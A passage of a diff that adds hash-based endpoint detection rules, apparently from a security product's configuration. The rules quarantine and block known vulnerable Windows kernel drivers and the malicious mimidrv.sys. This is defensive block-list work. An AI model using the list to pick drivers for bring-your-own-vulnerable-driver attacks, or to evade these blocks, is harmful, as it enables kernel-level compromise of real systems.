+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0760d845-aa17-5f17-8fef-68d93506d3e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455304Z",
+ "creation_date": "2026-03-23T11:45:30.455307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c509935f3812ad9b363754216561e0a529fc2d5b8e86bfa7302b8d149b7d04aa",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07664fd3-e35f-5924-9b44-fff36b1833a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474208Z",
+ "creation_date": "2026-03-23T11:45:31.474211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40168b00f67f66299e0dd90821d58cc99847b240cbdc5e55798d3faf8b517323",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "076fa59c-9e94-5898-9e7c-12b71b877968",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478443Z",
+ "creation_date": "2026-03-23T11:45:30.478447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73fddd441a764e808ed6d6b8f3d0d13713e61221aa3cfef7da91cdaf112fe061",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07756c08-9011-51f9-83f6-0429ff62bac5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156126Z",
+ "creation_date": "2026-03-23T11:45:31.156128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e78e5d3343d079a8de332bf643119f9620744a02fa2996b9516388a104fa0acd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07850c35-b85f-58e0-8a78-3b9c6143b808",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488673Z",
+ "creation_date": "2026-03-23T11:45:31.488675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd2a221d679d56af948c3a60cbd005dce7efbcd1f99a07e06d3eba48691379b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0788752b-690e-5df5-ac06-4bc27d3e8633",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467296Z",
+ "creation_date": "2026-03-23T11:45:30.467300Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467309Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c24f503462a98f7a8bf0dbff0c8242e1f3d4e6cdf4327152f508717f0eafee4b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0788872b-1998-5761-aec0-acf2cc5feb97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482760Z",
+ "creation_date": "2026-03-23T11:45:31.482764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "598c6c1cb3fecd7406a21d28b231e24bf7803ebe7e460772add3a87819a59b88",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07a1edee-53c2-5aa8-84c6-1005c2d1246a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146241Z",
+ "creation_date": "2026-03-23T11:45:31.146243Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9f79647f8e09c23efd21d85cded1c6d91ff47bcb16875891373d700c9e644bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07a3621e-4039-5039-af12-13c8237a7916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972988Z",
+ "creation_date": "2026-03-23T11:45:29.972990Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fbcb371d53b8a76a25fbbafaae31147c0d1f6b9f26b3ea45262c2267386989",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07a416f8-07e9-50e0-b38f-6eca0bb0b241",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817250Z",
+ "creation_date": "2026-03-23T11:45:31.817252Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817258Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "505264db711d807080156698d019b75f7cd384775a7cec86d078cbe6e933dee8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07a69adb-f0ad-58c3-bb73-3d07382bf3a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605210Z",
+ "creation_date": "2026-03-23T11:45:29.605212Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605217Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ed37798f26ed2db67c01ae5229da39071e6130f495dfff733f9353f657f1c59",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07ac79fc-c673-588b-8e41-55615dcec095",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828649Z",
+ "creation_date": "2026-03-23T11:45:30.828652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d0eed7d4a655baaf39a130beb78fbe1791a0b438ad13405fd5a1594127e4c01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07c62b9a-7c5e-5f33-b40c-c4b59a8656a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825610Z",
+ "creation_date": "2026-03-23T11:45:31.825612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2c83c208933e42e27a4be03b0f9b734c36339e48841f9fe47a5282eb17e47da",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07ca592e-16aa-589f-be76-6e0d2c6cd8c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973923Z",
+ "creation_date": "2026-03-23T11:45:29.973925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b773511fdb2e370dec042530910a905472fcc2558eb108b246fd3200171b04d3",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07d6b9c1-6ddb-5113-a232-13e682d6f3d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817977Z",
+ "creation_date": "2026-03-23T11:45:30.817979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2bc7514201727d773c09a1cfcfae793fcdbad98024251ccb510df0c269b04e6",
+ "comment": "Vulnerable Kernel Driver (aka sepdrv3_1.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07de29c1-1825-5bec-950a-12b06fcec1a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821134Z",
+ "creation_date": "2026-03-23T11:45:30.821137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "898e07cf276ec2090b3e7ca7c192cc0fa10d6f13d989ef1cb5826ca9ce25b289",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07ea975a-45fc-52cf-995b-96cfd5923226",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815123Z",
+ "creation_date": "2026-03-23T11:45:31.815125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ad1dceb988c6c081726e950d2f420e2dac21c59160cc7919106e14988203cc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07ede0ac-ff29-5f78-9ec5-d97b29a62b77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821210Z",
+ "creation_date": "2026-03-23T11:45:31.821213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64da70b335897e3bc806bb4745fcc44fc80f3632edd418cb9ade3669cf29034b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07f2152c-8bdd-5451-87e2-bcfdbf7bb255",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820108Z",
+ "creation_date": "2026-03-23T11:45:31.820112Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fde6f8995ea6d7573471f2f60eed14d70759b3285543fb253fc1485d08982933",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07f73354-d356-5aca-b81c-889280b682bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618288Z",
+ "creation_date": "2026-03-23T11:45:29.618290Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618295Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c188b36f258f38193ace21a7d254f0aec36b59ad7e3f9bcb9c2958108effebad",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07fb1fa8-aef7-5519-8e01-94f1164526e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808987Z",
+ "creation_date": "2026-03-23T11:45:31.808989Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6c7ad757caca0914847acb9672482005ef5ddc453484d54f6938ab1c594b7df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08096db0-82c5-517d-9220-26d4a0decc85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479422Z",
+ "creation_date": "2026-03-23T11:45:30.479424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38d6d90d543bf6037023c1b1b14212b4fa07731cbbb44bdb17e8faffc12b22e8",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0810700b-96ed-5d09-b71e-0a8e87cdba4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
